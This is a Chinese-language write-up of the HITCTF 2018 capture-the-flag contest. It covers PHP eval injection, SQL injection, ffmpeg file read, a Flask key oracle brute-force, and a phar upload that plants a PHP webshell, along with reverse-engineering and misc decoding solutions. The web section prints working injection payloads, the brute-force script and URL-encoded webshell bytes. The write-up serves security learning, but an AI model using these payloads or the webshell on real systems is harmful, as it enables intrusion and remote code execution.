WEB

PHPreading

源码泄露，存在index.php.bak，，解一下base64知道

$flag=$_GET['asdfgjxzkallgj8852'];if($flag=='H1TctF2018EzCTF'){die($flag);}die('emmmm');

输入得到flag

BabyEval

看一下泄露了一部分源码

<!--
$str=@(string)$_GET['str'];
blackListFilter($black_list, $str);
eval('$str="'.addslashes($str).'";');
-->

首先查到了如果是在双引号内可以通过这样的方式执行eval

?str=${${phpinfo()}}

然后先输出全局变量看一下，没发现flag，但是看到了黑名单…

然而貌似没什么卵用，继续吧，是不是藏到了index.php中？但是看了以后发现也不是。。。

/?str=${${var_dump(file(chr(46).chr(47).chr(105).chr(110).chr(100).chr(101).chr(120).chr(46).chr(112).chr(104).chr(112)))}}

可以查看index.php，然后就猜测应该还有别的文件了！然后最后在根目录找到了flag的文件

/?str=${${var_dump(glob(chr(47).chr(42)))}}

然后最后费劲巴拉终于解决了问题

/?str=${${var_dump(file(chr(47).chr(49).chr(54).chr(50).chr(57).chr(50).chr(48).chr(57).chr(55).chr(54).chr(100).chr(57).chr(99).chr(48).chr(52).chr(97).chr(99).chr(54).chr(57).chr(101).chr(50).chr(102).chr(52).chr(51).chr(57).chr(50).chr(97).chr(56).chr(99).chr(102).chr(102).chr(98).chr(102).chr(95).chr(102).chr(108).chr(97).chr(103).chr(46).chr(116).chr(120).chr(116)))}}

题目还是不错的。
补充一下我的方法肯能太笨了…补充好做的方法…

小电影

打开题目一看，说是ffmpeg,立马想到去年出的ffmpeg任意文件读取漏洞了，利用file协议的脆弱吧，但是这里不太好的就是不知道文件的路径，猜测flag.txt成功了。
具体怎么做，其实就是用人家的脚本…脚本小子…上传的文件名必须是123.avi，最后得到flag如下

BabyInjection

给了源码

<?php
error_reporting(0);if (!isset($_POST['username']) || !isset($_POST['passwd'])) {echo 'Login and get the flag';echo '<form action="" method="post">'."<br/>";echo '<input name="username" type="text" placeholder="username"/>'."<br/>";echo '<input name="passwd" type="text" placeholder="passwd"/>'."<br/>";echo '<input type="submit" ></input>'."<br/>";echo '</form>'."<br/>";die;
}$flag = '';
$filter = "and|select|from|where|union|join|sleep|benchmark|,|\(|\)|like|rlike|regexp|limit|or";$username = $_POST['username'];
$passwd = $_POST['passwd'];
if (preg_match("/".$filter."/is",$username)==1){die("Hacker hacker hacker~");
}
if (preg_match("/".$filter."/is",$passwd)==1){die("Hacker hacker hacker~");
}$conn = mysqli_connect();$query = "SELECT * FROM users WHERE username='{$username}';";
echo $query."<br>";
$query = mysqli_query($conn, $query);
if (mysqli_num_rows($query) == 1){$result = mysqli_fetch_array($query);if ($result['passwd'] == $passwd){die('you did it and this is your flag: '.$flag);}else{die('Wrong password');}
}
else{die('Wrong username');
}

这个貌似是一道实验吧的原题，但是我实在是记不清楚了，最后发现是用with rollup绕过的,但是这里貌似限制了limit的使用，怎么限制呢？这里用了having，半天才想到，真是垃圾！
with rollup的特性在此不讲，和group by组合生成一个列为null的插入查询。然后用having passwd is null限制即可
最后构造如下

注意passwd不要输入内容，貌似因为mysql中的null转换到php中是一个空字符串，如果有输入就一定是“”==“某串”，肯定是错的。
好题好题！

BabyLeakage

这个题目我是有点不懂得，说真的都不知道怎么弄出来了，利用了网站的报错机制，首先显示报错泄露了文件的结构

然后构造这个 /news/article/1/1/类似的去爆信息
然后看到了很多不得了的信息啊

然后需要远程登陆一下他的mysql！

mysql> use F1agIsHere;
Database changed
mysql> describe f
-> ;
+-------+------+------+-----+---------+-------+
| Field | Type | Null | Key | Default | Extra |
+-------+------+------+-----+---------+-------+
| H     | text | YES  |     | NULL    |       |
| I     | text | YES  |     | NULL    |       |
| TC    | text | YES  |     | NULL    |       |
| T     | text | YES  |     | NULL    |       |
| F     | text | YES  |     | NULL    |       |
+-------+------+------+-----+---------+-------+
5 rows in set (0.02 sec)mysql> describe f;
+-------+------+------+-----+---------+-------+
| Field | Type | Null | Key | Default | Extra |
+-------+------+------+-----+---------+-------+
| H     | text | YES  |     | NULL    |       |
| I     | text | YES  |     | NULL    |       |
| TC    | text | YES  |     | NULL    |       |
| T     | text | YES  |     | NULL    |       |
| F     | text | YES  |     | NULL    |       |
+-------+------+------+-----+---------+-------+
5 rows in set (0.02 sec)mysql> describe l;
+---------+------+------+-----+---------+-------+
| Field   | Type | Null | Key | Default | Extra |
+---------+------+------+-----+---------+-------+
| {       | text | YES  |     | NULL    |       |
| C10se_  | text | YES  |     | NULL    |       |
| Debu91n | text | YES  |     | NULL    |       |
+---------+------+------+-----+---------+-------+
3 rows in set (0.02 sec)mysql> describe a;
+----------+------+------+-----+---------+-------+
| Field    | Type | Null | Key | Default | Extra |
+----------+------+------+-----+---------+-------+
| fo_Is_Im | text | YES  |     | NULL    |       |
| mmp      | text | YES  |     | NULL    |       |
| ort      | text | YES  |     | NULL    |       |
+----------+------+------+-----+---------+-------+
3 rows in set (0.02 sec)mysql> describe g;
+-------+------+------+-----+---------+-------+
| Field | Type | Null | Key | Default | Extra |
+-------+------+------+-----+---------+-------+
| 4n7   | text | YES  |     | NULL    |       |
| }     | text | YES  |     | NULL    |       |
+-------+------+------+-----+---------+-------+
2 rows in set (0.02 sec)

最终答案

HITCTF{C10se_Debu91nfo_Is_Immmport4n7}

SecurePY

这个题目本来没什么思路，结果找到了相似的题目，这是不是TWCTF2017的题目？呃呃呃，提示是/pycache/，然后想到了这个
在 python-web 应用中，当前目录下， .py文件生成的pyc文件会被存储在 pycache文件夹中，并以 .cpython-XX.pyc 为扩展名，其中的 XX 与 CPython 版本有关。比如app.py，其对应的 pyc文件路径为 pycache/app.cpython-35.pyc。我们尝试访问：

http://123.206.83.157:8000/__pycache__/app.cpython-35.pyc

结果还真有东西！然后反编译得到代码

#!/usr/bin/env python
# visit http://tool.lu/pyc/ for more information
from flask import Flask, request, jsonify, render_template
from Crypto.Cipher import AES
from binascii import b2a_hex, a2b_hex
import os
app = Flask(__name__)
flag_key = os.environ['KEY']
flag_enc = '9cf742955633f38d9c628bc9a9f98db042c6e4273a99944bc4cd150a0f7b9f317f52030329729ccf80798690667a0add'def index():return render_template('index.html', flag_enc = flag_enc)index = app.route('/')(index)def getflag():req = request.jsonif not req:return jsonify(result = False)if None not in req:return jsonify(result = False)key = None['key']if len(key) != len(flag_key):return jsonify(result = False)for (x, y) in zip(key, flag_key):if ord(x) ^ ord(y):return jsonify(result = False)cryptor = AES.new(key, AES.MODE_CBC, b'0000000000000000')plain_text = cryptor.decrypt(a2b_hex(flag_enc))flag = plain_text.decode('utf-8').strip()return jsonify(result = True, flag = flag)getflag = app.route('/getflag', methods = ['POST'])(getflag)
if __name__ == '__main__':app.run()

这个是简化版本的，首先我们看到加密的密钥要用来作为CBC模式的密钥，那么不出意外是16位。
我们能根据服务器端返回来的信息来判断长度是否符合。我们传入的参数key，服务器端并没有验证它的类型，也就是说我们可以传入一个list，而不是一个字符串。我们为什么可以判断？看下图

如果是长度不匹配那么返回上面红色阔内return false了，如果通过进入下一句，如果json传入null，转换成python就变了

而ord(None)会崩溃返回500！
我们尝试一下

这就说明长度确实是16位的了。
然后我们继续看还有对密钥的判断

这是对每一位进行判断，某一位不通过反汇false，我们可以构造null结尾的数组，如果通过那么就会检测下一组的null，反汇500，如果没通过就会返回false！666直接写程序把

import requests
url = "http://123.206.83.157:8000/getflag"
key = [None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None]
for index in range(16):for i in range(32,128):key[index] = str(chr(i))payload = {"key":key}text = requests.post(url,json=payload).textif "500 Internal Server Error" in text :print("".join(key[:index+1]))breakif "true" in text:print("".join(key))exit()

然后就能爆破出密钥了，真的原题要更复杂一些，这里简化了。密钥为5ecur3pPYpyPYk3y

HITCTF{O0o0o0oOracle_Attttttack_1s_yinQu3S17ing}

BabyWrite

比赛后期一航巨佬都快放出来wp了…貌似就是XNUCA练习赛login，让一航大佬生生搞了个getshell的非常规做法，真心牛逼，这里限制更多了一些
首先包含得到源码index.php

<?php
if(isset($_GET['page'])){$file = $_GET['page'].'.php';include($file);
}else{header("Location: /?page=login");die();
}
?>

<!DOCTYPE html>
<html>
<head><title>CTF</title>
</head>
<body>登陆解锁更多功能<form action="login.php" method="POST">用户名 : <input name="username" placeholder="username"><br/>密码 : <input name="password" placeholder="password"><br/><br/><input type="submit" value="登陆"></form>
</body>
</html><?phprequire_once('config.php');if(isset($_POST['username']) && isset($_POST['password'])){$username = $_POST['username'];$password = $_POST['password'];if ($username === "admin" && sha1(md5($password)) === $admin_hash){echo '<script>alert("Login seccess!");</script>';}else{if (isset($_GET['debug'])){if($_GET['debug'] === 'hitctf'){$logfile = "log/".$username.".log";$content = $username." => ".$password;file_put_contents($logfile, $content);}else{echo '<script>alert("Login failed!");</script>';}}else{echo '<script>alert("Login failed!");</script>';}}}else{echo '<script>alert("Please input username and password!");</script>';}
?>

config.php

<?php$admin_hash = "df650edd89a1abfb417124133daf4c103e6d2e97";

尝试了王师傅的zip不行，问了一下说根本没装php zip，换了phar尝试，结果坑到死…mmp
首先是生成就废了很大功夫…真是傻一个单词坑一下午！！！

<?php
$phar = new Phar('shell.phar', 0);
$phar['shell.php'] = '<?php eval($_POST[\'cmd\']);?>' ;
$phar->setStub('<?php __HALT_COMPILER();?>');
?>

生成文件，注意的是倒数28字节中，前20字节是文件校验和，sha1处理的，我们需要重新计算，因为文件中会加入一个=> 四字节
首先生成的文件是这样的

然后这样输入一下

username=1&password=%3c%3f%70%68%70%20%5f%5f%48%41%4c%54%5f%43%4f%4d%50%49%4c%45%52%28%29%3b%20%3f%3e%0d%0a%37%00%00%00%01%00%00%00%11%00%00%00%01%00%00%00%00%00%00%00%00%00%09%00%00%00%73%68%65%6c%6c%2e%70%68%70%1c%00%00%00%23%35%74%5a%1c%00%00%00%1f%41%8d%73%b6%01%00%00%00%00%00%00%3c%3f%70%68%70%20%65%76%61%6c%28%24%5f%50%4f%53%54%5b%27%63%6d%64%27%5d%29%3b%3f%3e%e5%f4%27%dc%f5%71%41%5a%47%c0%3d%32%d3%68%c6%a2%24%09%81%ff%02%00%00%00%47%42%4d%42

这个时候文件前面会多加5个字节！就是1 =>(或者下载下来修改后的文件)
我们后面的工作就是加上这五个字节，重新计算一下校验！校验在就是sha1…这个sha1计算是去掉后28字节在计算…

def getSha1(filename): sha1Obj = sha1()with open(filename, 'rb') as f:sha1Obj.update(f.read())return sha1Obj.hexdigest()

计算后更新一下…

调整后输入

username=1&password=%3c%3f%70%68%70%20%5f%5f%48%41%4c%54%5f%43%4f%4d%50%49%4c%45%52%28%29%3b%20%3f%3e%0d%0a%37%00%00%00%01%00%00%00%11%00%00%00%01%00%00%00%00%00%00%00%00%00%09%00%00%00%73%68%65%6c%6c%2e%70%68%70%1c%00%00%00%23%35%74%5a%1c%00%00%00%1f%41%8d%73%b6%01%00%00%00%00%00%00%3c%3f%70%68%70%20%65%76%61%6c%28%24%5f%50%4f%53%54%5b%27%63%6d%64%27%5d%29%3b%3f%3e%e7%1d%cc%17%64%66%5c%85%c9%4d%3a%7e%e9%2a%8a%cc%61%db%d8%a0%02%00%00%00%47%42%4d%42

哇…好难的题目…但是真是长见识了！！！感谢pr0ph3t师傅，膜膜膜！

BabyQuery

这个题目本来我没做出来，被上一题搞蒙蔽了…是什么Graphsql注入
首先是看一下输入

类似json的格式，然后苏我欸的GE======其实是1的base32啦，但是我们进行别的测试的时候发现了长度限制

这就很麻烦了，然后我胡乱改了一下函数名字

还有另一个函数getscorebyyourname，尝试使用它

然后发现没有长度限制啦！但是我组到这里就jj了…
像mysql构造注入试一试…

1' union select '1

妈耶…然后正常注入试试

1' union select databases() where '1

呃呃呃？？？难道不是mysql，猜测是sqlite3喽

1' union select 1 from sqlite_master where '1

应该没跑了，因为sqlite_master是sqlite的隐藏表

0' union select(select name from sqlite_master where type='table' limit 1,1) where '1

看到了 Secr3t_fl4g
然后

0' union select(select * from Secr3t_fl4g) where '1

膜一发一叶飘零

REVERSE

Baby Android

简单的安卓签到题目得到简单的抑或代码

计算结果如下

s1 = '#$%$#!&#^_^~(:p@_*#######'
s2 = 'kmqgwg]Tm3=NE_/4ouKJW@WE^'
flag =''
for i in range(len(s1)):flag +=chr(ord(s1[i])^ord(s2[i]))
print flag
#HITCTF{w3lc0me_t0_hitctf}

网管的麒麟臂

没怎么接触过着实吓了我一跳，直接分析吧，其实最关键的要的是KEY而已
c代码

#include <stdio.h>
#include <fcntl.h>
int key1(){asm("mov r3, pc\n");
}
int key2(){asm("push   {r6}\n""add    r6, pc, $1\n""bx r6\n"".code   16\n""mov    r3, pc\n""add    r3, $0x4\n""push   {r3}\n""pop    {pc}\n"".code  32\n""pop    {r6}\n");
}
int key3(){asm("mov r3, lr\n");
}
int main(){int key=0;printf("Enjoy Binnary!");scanf("%d", &key);if( (key1()+key2()+key3()) == key ){printf("Congratz!\n");}else{printf("Try Harder! XD\n");}return 0;
}

dump值

(gdb) disass main
Dump of assembler code for function main:0x00008d3c <+0>: push    {r4, r11, lr}0x00008d40 <+4>: add r11, sp, #80x00008d44 <+8>: sub sp, sp, #120x00008d48 <+12>:    mov r3, #00x00008d4c <+16>:    str r3, [r11, #-16]0x00008d50 <+20>:    ldr r0, [pc, #104]  ; 0x8dc0 <main+132>0x00008d54 <+24>:    bl  0xfb6c <printf>0x00008d58 <+28>:    sub r3, r11, #160x00008d5c <+32>:    ldr r0, [pc, #96]   ; 0x8dc4 <main+136>0x00008d60 <+36>:    mov r1, r30x00008d64 <+40>:    bl  0xfbd8 <__isoc99_scanf>0x00008d68 <+44>:    bl  0x8cd4 <key1>0x00008d6c <+48>:    mov r4, r00x00008d70 <+52>:    bl  0x8cf0 <key2>0x00008d74 <+56>:    mov r3, r00x00008d78 <+60>:    add r4, r4, r30x00008d7c <+64>:    bl  0x8d20 <key3>0x00008d80 <+68>:    mov r3, r00x00008d84 <+72>:    add r2, r4, r30x00008d88 <+76>:    ldr r3, [r11, #-16]0x00008d8c <+80>:    cmp r2, r30x00008d90 <+84>:    bne 0x8da8 <main+108>0x00008d94 <+88>:    ldr r0, [pc, #44]   ; 0x8dc8 <main+140>0x00008d98 <+92>:    bl  0x1050c <puts>0x00008d9c <+96>:    ldr r0, [pc, #40]   ; 0x8dcc <main+144>0x00008da0 <+100>:   bl  0xf89c <system>0x00008da4 <+104>:   b   0x8db0 <main+116>0x00008da8 <+108>:   ldr r0, [pc, #32]   ; 0x8dd0 <main+148>0x00008dac <+112>:   bl  0x1050c <puts>0x00008db0 <+116>:   mov r3, #00x00008db4 <+120>:   mov r0, r30x00008db8 <+124>:   sub sp, r11, #80x00008dbc <+128>:   pop {r4, r11, pc}0x00008dc0 <+132>:   andeq   r10, r6, r12, lsl #90x00008dc4 <+136>:   andeq   r10, r6, r12, lsr #90x00008dc8 <+140>:           ; <UNDEFINED> instruction: 0x0006a4b00x00008dcc <+144>:           ; <UNDEFINED> instruction: 0x0006a4bc0x00008dd0 <+148>:   andeq   r10, r6, r4, asr #9
End of assembler dump.
(gdb) disass key1
Dump of assembler code for function key1:0x00008cd4 <+0>: push    {r11}       ; (str r11, [sp, #-4]!)0x00008cd8 <+4>: add r11, sp, #00x00008cdc <+8>: mov r3, pc0x00008ce0 <+12>:    mov r0, r30x00008ce4 <+16>:    sub sp, r11, #00x00008ce8 <+20>:    pop {r11}       ; (ldr r11, [sp], #4)0x00008cec <+24>:    bx  lr
End of assembler dump.
(gdb) disass key2
Dump of assembler code for function key2:0x00008cf0 <+0>: push    {r11}       ; (str r11, [sp, #-4]!)0x00008cf4 <+4>: add r11, sp, #00x00008cf8 <+8>: push    {r6}        ; (str r6, [sp, #-4]!)0x00008cfc <+12>:    add r6, pc, #10x00008d00 <+16>:    bx  r60x00008d04 <+20>:    mov r3, pc0x00008d06 <+22>:    adds    r3, #40x00008d08 <+24>:    push    {r3}0x00008d0a <+26>:    pop {pc}0x00008d0c <+28>:    pop {r6}        ; (ldr r6, [sp], #4)0x00008d10 <+32>:    mov r0, r30x00008d14 <+36>:    sub sp, r11, #00x00008d18 <+40>:    pop {r11}       ; (ldr r11, [sp], #4)0x00008d1c <+44>:    bx  lr
End of assembler dump.
(gdb) disass key3
Dump of assembler code for function key3:0x00008d20 <+0>: push    {r11}       ; (str r11, [sp, #-4]!)0x00008d24 <+4>: add r11, sp, #00x00008d28 <+8>: mov r3, lr0x00008d2c <+12>:    mov r0, r30x00008d30 <+16>:    sub sp, r11, #00x00008d34 <+20>:    pop {r11}       ; (ldr r11, [sp], #4)0x00008d38 <+24>:    bx  lr
End of assembler dump.
(gdb)

首先KEY1的关键点

KEY1=0x00008cdc+8 (注意PC值都是先偏移再计算的)
再看KEY2的关键点

bx指令特别说明一下，带状态切换的跳转。最低位为1时，切换到Thumb指令执行，为0时，解释为ARM指令执行。所谓的Thumb模式就是自带的一种16位的指令集。这个时候pc不是+8了而是+4！所以我们下面的计算如下

r6=0x00008cfc+8=0x00008d00
因为最低位是0所以切换到Thumb模式
r3=0x00008d04+4
KEY2=r0=r3=r3+4

最后看一下KEY3，是一样的道理
你说LR寄存器？他的作用是记录子函数的返回地址或者是异常时候当前地址-4，所以这个地方没异常，所以地点是

KEY3=0x00008d80
最后计算三个值和为108400

学习资料的密码

关键函数在于basen这个函数上，密文是

llW00ml0lWeml3Weceec3m03c0e!0mc!cW0cl3ecc3lm!0eccllecmmWcmWcmWm3c!l

简单分析一下程序，目标总共67位，67=8*8+3，满足输入长度n%3==1的情况，所以输入的字符串长度为8*3+1=25位，然后写程序把它还原回来

s = 'llW00ml0lWeml3Weceec3m03c0e!0mc!cW0cl3ecc3lm!0eccllecmmWcmWcmWm3c!l'
table = 'W3lc0me!'
flag=''
for i in range(len(s)/8):temp = s[i:i+8]c=((table.index(s[i*8+2])&6)>>1)|(table.index(s[i*8+1])<<2)|(table.index(s[i*8+0])<<5)flag+=chr((int)(c))c=((table.index(s[i*8+2])&1)<<7)|(table.index(s[i*8+3])<<4)|(table.index(s[i*8+4])<<1)|((table.index(s[i*8+5])&4)>>2)flag+=chr((int)(c))c=((table.index(s[i*8+5])&3)<<6)|(table.index(s[i*8+6])<<3)|(table.index(s[i*8+7]))flag+=chr((int)(c))
c=((table.index(s[66])&6)>>1)|(table.index(s[65])<<2)|(table.index(s[64])<<5)
flag+=chr((int)(c))
print flag

HITCTF{3asy_b4se_3ight:)}

最终难题又没做…

MISC

签到

BaSO4

用pyc反编译器反编译得到代码

# Embedded file name: base_32_64.py
import base64
import random
import os
import sys
with open('flag.txt', 'r') as file:flag = file.read()
for i in range(0, 20):if random.randint(0, 1):flag = base64.b64encode(flag)else:flag = base64.b32encode(flag)with open('flag_encode.txt', 'w') as file:file.write(flag)

反正不是base64就是base32了，倒是不用写脚本，手动尝试即可

HITCTF{Dont_dive_into_misc}

攻击流量分析

其实就是文件目录扫描，然后再后面成功了两个

分别是index.php和flag.txt（这里丢了个=），明显我们要的就是第二个了

<?php
$data = "\x78\x9c\xcb\xc8\x2c\x49\x2e\x49\xab\xb6\x30\x4d\x32\x48\x4c\x35\x4e\xb4\x48\x34\x37\xb0\x48\xb2\x34\x32\x4f\x4a\x33\x4c\x34\x36\x48\x49\x4b\x33\x4e\x36\x33\x35\x31\xa8\xe5\x02\x00\x18\xcb\x0c\x6c";
print_r(gzuncompress($data));
?>
//hitctf{85b0ae3a8a708b927bf1a30dff3c6540}

use_your_ida

这个题目的套路在MCTF上见过，最后就是利用流程图组成一个图片吧

键盘流量分析

这个键盘敲击记录，我不是很会，但是我发现不是很会的东西去看看一航巨佬总是有收获，修改修改一下一航巨佬的代码就能使用了（具体需要看一下流量中的数据）

#!/usr/bin/env pythonimport sys
import osDataFileName = "usb.dat"presses = []normalKeys = {"04":"a", "05":"b", "06":"c", "07":"d", "08":"e", "09":"f", "0a":"g", "0b":"h", "0c":"i", "0d":"j", "0e":"k", "0f":"l", "10":"m", "11":"n", "12":"o", "13":"p", "14":"q", "15":"r", "16":"s", "17":"t", "18":"u", "19":"v", "1a":"w", "1b":"x", "1c":"y", "1d":"z","1e":"1", "1f":"2", "20":"3", "21":"4", "22":"5", "23":"6","24":"7","25":"8","26":"9","27":"0","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"\t","2c":"<SPACE>","2d":"-","2e":"=","2f":"[","30":"]","31":"\\","32":"<NON>","33":";","34":"'","35":"<GA>","36":",","37":".","38":"/","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>","ff":""}shiftKeys = {"04":"A", "05":"B", "06":"C", "07":"D", "08":"E", "09":"F", "0a":"G", "0b":"H", "0c":"I", "0d":"J", "0e":"K", "0f":"L", "10":"M", "11":"N", "12":"O", "13":"P", "14":"Q", "15":"R", "16":"S", "17":"T", "18":"U", "19":"V", "1a":"W", "1b":"X", "1c":"Y", "1d":"Z","1e":"!", "1f":"@", "20":"#", "21":"$", "22":"%", "23":"^","24":"&","25":"*","26":"(","27":")","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"\t","2c":"<SPACE>","2d":"_","2e":"+","2f":"{","30":"}","31":"|","32":"<NON>","33":"\"","34":":","35":"<GA>","36":"<","37":">","38":"?","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>","ff":""}def main():# check argvif len(sys.argv) != 2:print "Usage : "print "        python UsbKeyboardHacker.py data.pcap"print "Tips : "print "        To use this python script , you must install the tshark first."print "        You can use `sudo apt-get install tshark` to install it"print "Author : "print "        WangYihang <wangyihanger@gmail.com>"print "        If you have any questions , please contact me by email."print "        Thank you for using."exit(1)# get argvpcapFilePath = sys.argv[1]# get data of pcapos.system("tshark -r %s -T fields -e usb.capdata > %s" % (pcapFilePath, DataFileName))# read datawith open(DataFileName, "r") as f:for line in f:presses.append(line[0:-1])# handleresult = ""for press in presses:Bytes = press.split(":")if Bytes[0] == "00":if Bytes[2] != "00":result += normalKeys[Bytes[2]]elif Bytes[0] == "02": # shift key is pressed.if Bytes[2] != "00":result += shiftKeys[Bytes[2]]else:print "[-] Unknow Key : %s" % (Bytes[0])print "[+] Found : %s" % (result)# clean the temp dataos.system("rm ./%s" % (DataFileName))if __name__ == "__main__":main()

根据flag格式改一下就行了。

CRYPTO根本没做…菜

HITCTF 2018 wp [我真是菜鸟]相关推荐

linux 黑曜石浏览器,Hackergame 2018 wp · float’s blog
8种机械键盘轴体对比本人程序员,要买一个写代码的键盘,请问红轴和茶轴怎么选? emmmmmm这次的Hackgame还是脑洞为主...我只做出来了6道题,这里结合官方wp总结一下,题目现在还是可以做的 ...
阿里菜鸟回答2018：智能物流骨干网里的4张技术面孔
乾明李根发自江浙沪量子位报道 | 公众号 QbitAI 物流行业会怎样回答他们的2018? 阿里菜鸟网络说,在11月20日那天,便交上了答卷. 今年的双11物流,9天,10亿包裹全部送完. ...
菜鸟出海，能成功吗？
菜鸟又在谋划什么? 继推出免费送货上门服务之后,菜鸟供应链在浙江成立了国际货运公司,经营范围包括海关监管货物仓储服务.出口监管仓库经营.道路货物运输等. "统一"快递江湖后,菜鸟网 ...
激光雷达的厮杀18年：西方“诸神黄昏”，东方“新王隐现”
鼻祖.发明家.神童.梦想家.特种兵和中国双星,激光雷达"诸神混战",行业疯狂洗牌. 风云激荡中,每个人都在亲身见证历史. 2004年,美国发起DARPA挑战赛,无人车上路,汽车上首 ...
2018西安工业大学第二届萌新线上赛MISC WP
flag 将文件解压,得到一个flag.doc 打开linux终端使用:strings flag.doc | grep "flag" 得到flag: sky 打开压缩包,发现一张 ...
面向萌新的红帽杯2018线上赛wp
网络安全攻防大赛第二届"红帽杯"网络安全攻防大赛(除了web3 guess id,不会做.没写.) misc2 Not Only Wireshark 下载流量包,wireshark ...
菜鸟第一次wp项目总结
最近几个人做了wp端一个叫做"新生助手"的小应用,是在行车路线.新生须知.学院地图等方面帮助大一入学新生的一款应用,虽然做的很烂,但是其中的收获还是很多的,在此写下我的一些感受. ...
2018西安工业大学第二届萌新线上赛web WP
赛题网站:http://117.34.116.134/ WBE 榕榕学姐的美好祝愿打开链接右击,查看页面源码得到flag web1 打开,发现右击,查看源码,在最下面发现flag web2 打 ...
2018.11.4 东华杯（骇极） REVERSE What's it wp
What 打开先要求输入luck string,拖进ida看,输入的必须是长度为6的英文小写.之后对输入的数据取md5,然后遍历生成的MD5串,统计其中0的个数v15和下标总和v14,当满足10*v1 ...

HITCTF 2018 wp [我真是菜鸟]

WEB